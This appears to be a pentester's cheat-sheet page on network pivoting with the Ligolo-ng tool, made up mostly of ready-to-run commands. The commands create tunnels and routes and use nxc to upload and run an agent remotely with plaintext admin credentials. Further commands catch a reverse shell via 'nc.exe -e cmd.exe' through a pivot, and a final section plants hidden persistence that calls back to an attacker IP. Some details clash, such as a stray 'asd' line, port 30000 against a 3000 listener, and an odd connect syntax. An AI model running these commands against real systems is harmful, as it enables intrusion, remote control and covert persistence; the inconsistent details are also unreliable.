Ligolo-ng

Pivoting

Create and activate a new tunnel interface for ligolo :

# Create the interface
sudo ip tuntap add user kali mode tun ligolo
# Activate the interface
sudo ip link set ligolo up

On Ligolo-ng >= v0.6, this can be done in a single step:

ligolo-ng » interface_create --name ligolo
INFO[0006] Creating a new "ligolo" interface...
INFO[0006] Interface created!
ligolo-ng » interface_list
┌───────────────────────────┐
│ Available tuntaps         │
├───┬──────────┬────────────┤
│ # │ TAP NAME │ DST ROUTES │
├───┼──────────┼────────────┤
│ 0 │ ligolo   │            │
└───┴──────────┴────────────┘

When the environment has no internet availability, e.g. CTFs, practice labs, etc.:

./proxy -selfcert -laddr 0.0.0.0:443

When there is internet available on the environment, e.g. on an actual test environment:

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval.

./proxy -autocert -laddr 0.0.0.0:443

From the target machine:

# When -autocert is used on the proxy
./agent -connect 10.129.204.146:11601:443 -retry
# When -selfcert is used on the proxy
./agent -connect 10.129.204.146:11601:443 -ignore-cert -retry

asd

# List active sessions
ligolo-ng » session
# List interfaces of the target machine
[Agent : pivot@pivot-machine] >> ifconfig

Add a route to the target network:

sudo ip route add 172.16.10.0/24 dev ligolo

On Ligolo-ng (>= 0.6) this can be done internally:

ligolo-ng » interface_add_route --name ligolo --route 172.16.10.0/24
INFO[3206] Route created.

Finally, start the tunnel:

[Agent : pivot@pivot-machine] >> tunnel_start

Now, we can reach the 172.16.10.0/24 network from our Kali:

$ sudo nmap 172.16.10.0/24 -T4

Port-Forward

To access local ports on the connected agent, ligolo-ng uses a hardcoded "magic" CIDR: 240.0.0.0/4:

$ sudo ip route add 240.0.0.1/32 dev ligolo

Now, any IP queried in this unused subnet is automatically redirected to the agent's 127.0.0.1. For instance, the below scan will scan the target's loopback address (127.0.0.1):

$ nmap 240.0.0.1

Agent Transfer & Execution

We don't need elevated privileges on the target to use the ligolo-agent.

$ nxc smb 10.129.204.146 -u Administrator -p 'IpreferanewP@$$' --local-auth --put-file 'agent.exe' '\Windows\Temp\agent.exe'

$ nxc smb 10.129.204.146 -u Administrator -p 'IpreferanewP@$$' --local-auth -x '\Windows\Temp\agent.exe -connect 10.10.15.223:11601 -ignore-cert'

Reverse Shell

We have a route to the target network, but the target network does not have a route to our attack host. Thus, if we want to catch a reverse shell from a target other than the pivot host:

Create a listener on the agent/pivot host (0.0.0.0:3000) that will redirect the traffic to our proxy/attack host (127.0.0.1:4444).

[Agent : pivot@pivot-machine] >> listener_add --addr 0.0.0.0:3000 --to 127.0.0.1:4444 --tcp
INFO[0373] Listener 0 created on remote agent!

Start listening from our attack host:

$ nc -lvnp 4444
listening on [any] 4444...

Transfer the binary to the target:

nxc mssql 10.10.63.148 -u sql_svc -p Dolphin1 --put-file 'nc.exe' 'c:\windows\temp\nc.exe'

Connect from the target to the pivot machine (10.10.63.147) on the listening port (30000):

$ nxc mssql 10.10.63.148 -u sql_svc -p Dolphin1 -x 'c:\windows\temp\nc.exe 10.10.63.147 3000 -e cmd.exe'

This will connect to the agent's listener and then forwarded to our proxy:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.237] from (UNKNOWN) [192.168.45.237] 46144
...
C:\Windows\system32>whoami
nt service\mssql$sqlexpress

C:\Windows\system32>hostname
MS02

Persistence

# Linux targets
nohup /tmp/agent -connect 10.10.14.5:443 -ignore-cert > /dev/null 2>&1 &

# Windows targets
Start-Process -FilePath "C:\Windows\Temp\agent.exe" -ArgumentList "-connect 10.10.14.5:443 -ignore-cert" -WindowStyle Hidden

Resources

Introduction - Ligolo-ng Documentation

PreviousPivoting Tools NextSshuttle

Last updated 11 days ago

Was this helpful?